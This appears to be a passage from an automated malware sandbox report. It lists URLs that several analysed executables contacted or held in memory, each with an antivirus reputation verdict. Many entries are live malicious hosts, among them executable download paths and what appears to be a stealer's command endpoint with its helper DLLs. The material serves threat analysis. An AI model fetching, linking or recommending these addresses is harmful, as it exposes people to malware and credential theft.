http://helsinki-dtc.com/updates/yd/yt_wrtzr_1/win/version.txt?BaGHTJrEOqpSoOUUbPmVVgUlkCFxoVbnT	false	Avira URL Cloud: malware	unknown
https://vk.com/doc851967711_678965991?hash=15v5bIC0BdxsDWrpl71N2Lf9ztIhZN508DquMzIAGCz&dl=yDzL4lhSc6Qh08VS3lx8KlKwYrkSiYGlwvhnSbB1cMD&api=1&no_preview=1#1	false	Avira URL Cloud: safe	unknown
http://www.rapidfilestorage.com/clrls/cl_rls.json	false	Avira URL Cloud: malware	unknown
https://sun6-21.userapi.com/c235031/u851967711/docs/d19/e642d2d3ea8a/File.bmp?extra=codZE4oOkF_mb0aHMW2_KJkLotDgGHzpcd-JeGF88YLnbk2Qm4WcZoXVvzJ1HuH2HaOhqgSp6_uV0Z6TCfxUYwreX5Rq2H_XmfQYz82S4_LBrsYcRulTXC2HKGtLY-ovV1tbmUk3ivmp	false	Avira URL Cloud: safe	unknown
http://80.78.242.100/d/525403	false	Avira URL Cloud: safe	unknown
https://vk.com/doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsECNfeEiGdn2IU9JTEdwqaRFTDnZMFQJn7v9z&api=1&no_preview=1#ww11	false	Avira URL Cloud: safe	unknown
https://vk.com/doc851967711_678909859?hash=lNew8DPFlC3FkyFwDvSRD3AUel2qUbt8XwQ47izbny0&dl=VoWAeLPwa3VHUZ6RGMrmgXoJxs6sK0ufCNL8HdLsSa4&api=1&no_preview=1#xin	false	Avira URL Cloud: safe	unknown
http://www.rapidfilestorage.com/updates/yd/wrtzr_yt_a_1/win/version.txt?lkNOHJiXnxKRAffVlKrZwoIEmkviEhCxR	false	Avira URL Cloud: malware	unknown
http://www.rapidfilestorage.com/updates/yd/yt_wrtzr_1/win/version.txt?BAxskCrAzBkAQLhyBAyQiyrSwfaJVtVcO	false	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d491afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67&	false	Avira URL Cloud: safe	unknown
http://77.105.133.27/download/th/space.php	false	Avira URL Cloud: malware	unknown
http://77.105.133.27/download/123p.exe	false	Avira URL Cloud: malware	unknown
http://85.28.47.4/69934896f997d5bb/nss3.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
https://vk.com/doc461844031_680356434?hash=KmXLjZzwyKBjmzxff0Jo9U1YwRL71yZftAbVL5kdyKD&dl=3v6LT2A7IS0PX4HrE4vRkDm0d4mbocnTvyEbLzKxGUP&api=1&no_preview=1#def_meta	false	Avira URL Cloud: safe	unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.4/920475a59bac849d.php	true	Avira URL Cloud: malware	unknown
https://api.myip.com/	false	Avira URL Cloud: safe	unknown
http://api2.check-data.xyz/api2/google_api_ifi	false	Avira URL Cloud: malware	unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2429621536.0000000001D96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2429621536.0000000001D96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bitbucket.org:80/sdgdf/fbghhj/downloads/streamer.exem	1719859269.0326595_setup.exe, 00000000.00000003.2212265415.0000021663804000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.0000021663807000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234508442.0000021663802000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jira.adguard.com/browse/AG-7046	1719859269.0326595_setup.exe, 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199707802586hellosqlt.dllsqlite3.dll	yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000002.2451450016.0000000004314000.00000004.00000800.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000002.2421723577.000000000338B000.00000004.00000800.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000002.2451450016.000000000437B000.00000004.00000800.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000002.2451450016.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000002.2451450016.00000000043AF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://download.wondershare.net/cbs_down/filmora-idco_full1901.exe	IVTULQzdBmF3Bc0NeoxSnYvg.exe, IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
https://papi.vk.com/pushsse/ruim	1719859269.0326595_setup.exe, 00000000.00000003.2264362509.0000021663F76000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265235204.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264205776.0000021663D24000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2253179054.0000021663D24000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2251747845.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2254420397.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264812556.0000021663D6F000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264061575.0000021663F75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vk.com/doc461844031_680356434?hash=KmXLjZzwyKBjmzxff0Jo9U1YwRL71yZftAbVL5kdyKD&dl=3v6LT2A7IS	1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265378882.0000021663811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.000000000112B000.00000040.00000001.01000000.00000009.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000000.2311905117.00000000013CD000.00000080.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://sun6-23.userapi.com/	1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663826000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663826000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663862000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vk.com:80/doc851967711_678965991?hash=15v5bIC0BdxsDWrpl71N2Lf9ztIhZN508DquMzIAGCz&dl=yDzL4lh	1719859269.0326595_setup.exe, 00000000.00000003.2212265415.0000021663817000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265378882.0000021663811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll#	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://st6-21.vk.com/css/al/base.ec2ae8ae.css	1719859269.0326595_setup.exe, 00000000.00000003.2264362509.0000021663F76000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265235204.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264205776.0000021663D24000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2253179054.0000021663D24000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2251747845.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2254420397.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264812556.0000021663D6F000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264061575.0000021663F75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://80.78.242.100/d/525403pD	1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663862000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jira.adguard.com/browse/AG-20455	1719859269.0326595_setup.exe, 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
https://bitbucket.org:80/sdgdf/fbghhj/downloads/streamer.exeV	1719859269.0326595_setup.exe, 00000000.00000003.2212265415.0000021663804000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.0000021663807000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234508442.0000021663802000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jira.adguard.com/browse/AG-20454	1719859269.0326595_setup.exe, 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
https://vk.com	1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com	1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://download.wondershare.net/cbs_down/filmora-idco_64bit_full1901.exe	IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://80.78.242.100/d/525403com	1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663862000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aui-cdn.atlassian.com/	1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.0000021663831000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pop.wondershare.com/filmora-licen	IVTULQzdBmF3Bc0NeoxSnYvg.exe	false	Avira URL Cloud: safe	unknown
http://77.105.133.27/download/123p.exey	1719859269.0326595_setup.exe, 00000000.00000003.2252257065.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663858000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213201982.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2214611152.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2212265415.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dllq	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.innosetup.com/	H1pBxuA3W1wJGbhYT2DZXaLH.exe, 00000008.00000003.2338059167.0000000002018000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bbuseruploads.s3.amazonaws.com/FPj	1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663891000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://filmora.w	IVTULQzdBmF3Bc0NeoxSnYvg.exe	false	Avira URL Cloud: safe	unknown
http://77.91.77.81/mine/amadka.exe00	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000AA6000.00000040.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: phishing	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2429621536.0000000001D96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sun6-22.userapi.com/	1719859269.0326595_setup.exe, 00000000.00000003.2265315437.0000021663826000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2429621536.0000000001D96000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://jira.adguard.com/browse/AG-20454G	1719859269.0326595_setup.exe, 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
https://stats.vk-portal.net	1719859269.0326595_setup.exe, 00000000.00000003.2264362509.0000021663F76000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265235204.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264205776.0000021663D24000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2253179054.0000021663D24000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2251747845.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2254420397.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264812556.0000021663D6F000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264061575.0000021663F75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.winimage.com/zLibDllm_object	IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351446597.00000000006E0000.00000040.00000001.01000000.00000007.sdmp, IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000003.2398678029.0000000001880000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sun6-22.userapi.com/%r	1719859269.0326595_setup.exe, 00000000.00000003.2265315437.0000021663826000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://r.mradx.net	1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.cookielaw.org/	1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.0000021663831000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://a.884736279.xyz/	1719859269.0326595_setup.exe, 00000000.00000003.2252257065.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.vk.me	1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vk.com/oot%	1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.0000021663862000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.91.77.81/cost/go.exeAppData	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000B4A000.00000040.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: phishing	unknown
https://st6-21.vk.com/dist/web/polyfills.isolated.70196a4e.js	1719859269.0326595_setup.exe, 00000000.00000003.2264812556.0000021663D6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jira.adguard.com/browse/AG-20455N	1719859269.0326595_setup.exe, 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
http://77.91.77.81/cost/go.exe	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000AA6000.00000040.00000001.01000000.00000009.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000B4A000.00000040.00000001.01000000.00000009.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ocsp.sectigo.com0	1719859269.0326595_setup.exe, 00000000.00000003.2242900895.00000216655EC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://vk.com:80/doc851967711_678909859?hash=lNew8DPFlC3FkyFwDvSRD3AUel2qUbt8XwQ47izbny0&dl=VoWAeLP	1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234494208.0000021663814000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2214611152.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2236018116.0000021663817000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2214611152.0000021663816000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.0000021663817000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213201982.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2212265415.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663814000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2212265415.0000021663817000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265378882.0000021663811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vk.com:80/doc461844031_680356434?hash=KmXLjZzwyKBjmzxff0Jo9U1YwRL71yZftAbVL5kdyKD&dl=3v6LT2A	1719859269.0326595_setup.exe, 00000000.00000003.2212265415.0000021663817000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/	1719859269.0326595_setup.exe, 00000000.00000003.2252257065.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213201982.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2214611152.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2212265415.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://monoblocked.com/	1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jira.int.agrd.dev/browse/AG-32263	1719859269.0326595_setup.exe, 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
https://st6-21.vk.com	1719859269.0326595_setup.exe, 00000000.00000003.2264362509.0000021663F76000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265235204.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264205776.0000021663D24000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2253179054.0000021663D24000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2251747845.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2254420397.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264812556.0000021663D6F000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264061575.0000021663F75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ampproject.org	1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sun6-22.userapi.com/c235031/u851967711/docs/d58/101acf609709/crypted.bmp?extra=Ux3hmN1iPre6d	1719859269.0326595_setup.exe, 00000000.00000003.2264867017.0000021663C9F000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265378882.0000021663811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.vk.com/?act=logout&hash=a280e68e075c926b49&_origin=https%3A%2F%2Fvk.com&lrt=BDpxh3TFcr	1719859269.0326595_setup.exe, 00000000.00000003.2264362509.0000021663F76000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265235204.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264205776.0000021663D24000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2253179054.0000021663D24000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2251747845.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2254420397.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264812556.0000021663D6F000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264061575.0000021663F75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bitbucket.org/m/v	1719859269.0326595_setup.exe, 00000000.00000003.2212265415.000002166383D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
